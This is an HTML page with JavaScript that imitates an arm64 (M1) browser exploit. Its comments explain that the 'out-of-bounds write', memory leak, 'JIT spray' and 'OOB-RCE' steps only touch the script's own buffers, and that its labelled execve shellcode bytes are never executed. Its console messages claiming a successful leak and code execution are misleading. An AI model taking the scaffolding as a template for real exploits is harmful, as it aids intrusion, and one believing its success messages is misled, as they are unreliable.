<!DOCTYPE html>
<html>
<head>
<title>Fake exploit - M1</title>
</head>
<body>
<script>
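// Two script-owned ArrayBuffers plus Float64 views over them. Everything the
// "exploit" below reads or writes lives in these buffers (or in the plain JS
// array `oob`), i.e. inside memory this page allocated for itself.
const buffer1 = new ArrayBuffer(0x10000);
const buffer2 = new ArrayBuffer(0x20000);
const floatArr1 = new Float64Array(buffer1);
const floatArr2 = new Float64Array(buffer2);
// Fill with recognisable float patterns; the later "memory leak" prints these
// same values back. Bounds come from the views rather than hard-coded counts
// (0x10000 / 8 = 8192 and 0x20000 / 8 = 16384 elements, as before).
for (let i = 0; i < floatArr1.length; i++) floatArr1[i] = 0xDEADBEEF + i;
for (let i = 0; i < floatArr2.length; i++) floatArr2[i] = 0xBADC0FFEE + i;
// Ordinary JS array of 1000 doubles; `vuln` stores into it with plain indexing.
const oob = Array.from({ length: 1000 }, (_, i) => i + 0.1);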
/**
 * Stand-in for a "vulnerable" write primitive. It is an ordinary element
 * store into the JS array `oob`: indices past the current length simply grow
 * the array, so nothing outside the JavaScript heap is touched.
 * @param {number} index - array slot to write
 * @param {*} value - value to store at that slot
 */
function vuln(index, value) {
  Reflect.set(oob, index, value);
}
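// Simulated "corruption": these are in-bounds stores into the JS array `oob`
// (indices beyond its length just extend it), so no engine memory is affected.
vuln(1022, floatArr1);
vuln(1023, floatArr2);
const fakeBuffer = new ArrayBuffer(0x20000);
const fakeArr = new Uint8Array(fakeBuffer);
vuln(1023, fakeArr);
// readView aliases buffer1, which this script allocated itself; the "leak"
// below prints back the script's own 0xDEADBEEF+i float pattern.
const readView = new DataView(buffer1);
console.log("[+] Leaking initial memory (64 bytes):");
for (let i = 0; i < 64; i += 8) {
  console.log(`Offset ${i}: 0x${readView.getBigUint64(i, true).toString(16)}`);
}
console.log("[+] Overwriting memory...");
// Writes into the script's own buffer; the read-back immediately after only
// confirms the DataView round-trips the value.
readView.setBigUint64(0, 0x4141414141414141n, true);
console.log(`[+] Write test: 0x${readView.getBigUint64(0, true).toString(16)}`);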
/**
 * "JIT spray" stand-in: builds 100 identical closures, invokes the first once
 * and returns it. Nothing here is JIT-compiled or run as machine code — each
 * closure only copies a fixed byte array into buffer1 as plain data, sets a
 * marker byte at offset 1024 and returns 0x1337.
 * @returns {Function} the first of the 100 closures
 */
function jitSpray() {
  const makePayload = () =>
    function () {
      // Alert as a visible indicator (the original comment says "3 times",
      // but each invocation of this closure fires it once).
      alert("swaga s w a g a");
      // Bytes the author labels as arm64 (M1) "shellcode" (original comment:
      // "indicator + for execve"). They are only written into buffer1 via
      // mem.set as data; this script never maps or executes them.
      const shellcode = new Uint8Array([
        0x00, 0x00, 0x80, 0xd2,
        0x00, 0x09, 0x00, 0x91,
        0x61, 0x00, 0x80, 0xd2,
        0x21, 0x00, 0xa0, 0xf2,
        0x02, 0x00, 0x80, 0xd2,
        0xe8, 0x07, 0x80, 0xd2,
        0x00, 0x00, 0xa0, 0xd2,
        0x01, 0x00, 0x00, 0xd4,
      ]);
      const mem = new Uint8Array(buffer1);
      mem.set(shellcode, 0);
      // Marker byte that the end-of-script "OOB-RCE" check reads back.
      mem[1024] = 0xFF;
      return 0x1337;
    };
  const spray = Array.from({ length: 100 }, makePayload);
  spray[0]();
  return spray[0];
}
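console.log("[+] Starting JIT Spray...");
// jitSpray returns a plain JS closure; calling it runs JavaScript, not the
// byte array it copies into buffer1.
const jitFunc = jitSpray();
console.log("[+] JIT Spray completed!");
console.log("[+] Triggering JIT shellcode directly...");
jitFunc();
vuln(1022, [jitFunc]);
// readView still aliases buffer1, so this dumps the closure's byte array
// followed by the 0xDEADBEEF float pattern — not engine function metadata.
console.log("[+] Leaking jitFunc metadata (256 bytes):");
for (let i = 0; i < 256; i += 8) {
  console.log(`Func Offset ${i}: 0x${readView.getBigUint64(i, true).toString(16)}`);
}
console.log("[+] Attempting OOB-RCE...");
// In-bounds store of the closure into oob[100], then an ordinary JS call.
vuln(100, jitFunc);
oob[100]();
// The closure itself wrote 0xFF at buffer1[1024], so this check only confirms
// that the JS function ran; it is not evidence of native code execution.
const result = new Uint8Array(buffer1)[1024];
if (result === 0xFF) {
  console.log("[+] OOB-RCE executed successfully!");
} else {
  console.log(`[!] OOB-RCE failed: ${result}`);
}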
</script>
</body>
</html>